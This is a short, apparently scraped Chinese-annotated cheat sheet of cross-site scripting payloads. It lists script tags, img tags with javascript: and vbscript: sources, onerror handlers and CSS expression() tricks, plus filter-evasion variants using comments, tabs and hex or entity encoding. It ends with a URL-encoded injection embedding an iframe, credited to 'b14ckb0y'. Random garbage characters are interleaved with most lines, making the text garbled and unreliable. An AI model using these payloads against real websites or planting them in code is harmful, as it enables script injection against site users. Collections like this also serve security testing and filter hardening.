<script>alert("跨站")</script> (最常用)
& O) g8 n5 o; K9 ^( _% W<img scr=javascript:alert("跨站")></img>
* t, I r+ q' ]) H/ w" i4 }- G, u<img scr="javascript: alert(/跨站/)></img>
7 @( X2 }1 I4 ?; _" m) _7 J' j' b: ]<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
; T8 M% \3 Z7 L1 s. R( a( d3 p<img scr="#" onerror=alert(/跨站/)></img>" g1 }! G. Z+ s' ~6 Z! P
<img scr="#" style="xss:expression(alert(/xss/));"></img>1 p' J' B9 r: Y, m* H3 n
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)" a( b* H W% U* D* y
<img src=vbscript:msgbox ("xss")></img>
; e! }; \( c2 _; V& |; `<style> input {left:expression (alert('xss'))}</style>
4 {0 r% R. k9 o' M<div style={left:expression (alert('xss'))}></div>
5 A b) I: x% `7 v8 W' I- i<div style={left:exp/* */ression (alert('xss'))}></div>$ |4 j, Y6 A, P' W
<div style={left:\0065\0078ression (alert('xss'))}></div>; T; [+ }# b9 p0 p9 \
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>" ~5 {2 z8 B; b" b4 q6 |
unicode <div style="{left:expRessioN (alert('xss'))}">
" i, l: i8 ^" d2 K6 Z( H
7 p1 X1 _4 ]/ \% a/ k6 |! o"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["- R- C0 a0 W! k$ H. d
|